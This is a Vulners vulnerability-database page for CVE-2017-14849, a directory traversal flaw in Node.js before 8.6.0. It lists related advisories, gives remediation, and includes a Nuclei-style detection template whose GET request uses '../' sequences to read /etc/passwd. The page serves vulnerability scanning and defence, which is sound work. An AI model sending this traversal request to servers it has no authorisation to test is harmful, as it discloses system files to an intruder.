Vulners
Lucene search
Node.js <8.6.0 - Directory Traversal
| Reporter | Title | Published | Views | Family All 48 |
|---|---|---|---|---|
 | node -- access to unintended files | 27 Sep 201700:00 | – | freebsd |
 | Joyent Node.js Unauthorized Access Vulnerability | 28 Sep 201700:00 | – | cnvd |
 | CVE-2017-14849 | 28 Sep 201700:00 | – | cve |
 | CVE-2017-14849 | 28 Sep 201700:00 | – | cvelist |
 | CVE-2017-14849 | 28 Sep 201700:00 | – | debiancve |
 | Node.js 8.5.0 Path Traversal File Disclosure | 2 Jul 201800:00 | – | dsquare |
 | FreeBSD : node -- access to unintended files (1257718e-be97-458a-9744-d938b592db42) | 11 Oct 201700:00 | – | nessus |
| Node.js 8.5.x < 8.6.0 Path Traversal | 11 Mar 202100:00 | – | nessus |
 | Path validation vulnerability, September 2017 | 29 Sep 201700:00 | – | nodejsblog |
 | CVE-2017-14849 | 28 Sep 201701:29 | – | nvd |
10
id: CVE-2017-14849
info:
name: Node.js <8.6.0 - Directory Traversal
author: Random_Robbie
severity: high
description: Node.js before 8.6.0 allows remote attackers to access unintended files because a change to ".." handling is incompatible with the pathname validation used by unspecified community modules.
impact: |
An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
remediation: |
Upgrade Node.js to version 8.6.0 or higher to mitigate the vulnerability.
reference:
- https://twitter.com/nodejs/status/913131152868876288
- https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/
- https://nvd.nist.gov/vuln/detail/CVE-2017-14849
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Elsfa7-110/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-14849
cwe-id: CWE-22
epss-score: 0.53416
epss-percentile: 0.9885
cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: nodejs
product: node.js
shodan-query: cpe:"cpe:2.3:a:nodejs:node.js"
tags: cve2017,cve,nodejs,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/static/../../../a/../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022100816a5c9299ff545691d532e94a43a990a06d67e5464cbe8ddcec1c9b02b882b302205ec5ddce164176fa9435c1e610cadab8dbdb9108915df715ce7d0ede75b0f70d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.1High risk
Vulners AI Score8.1
CVSS 25
CVSS 37.5
EPSS0.53416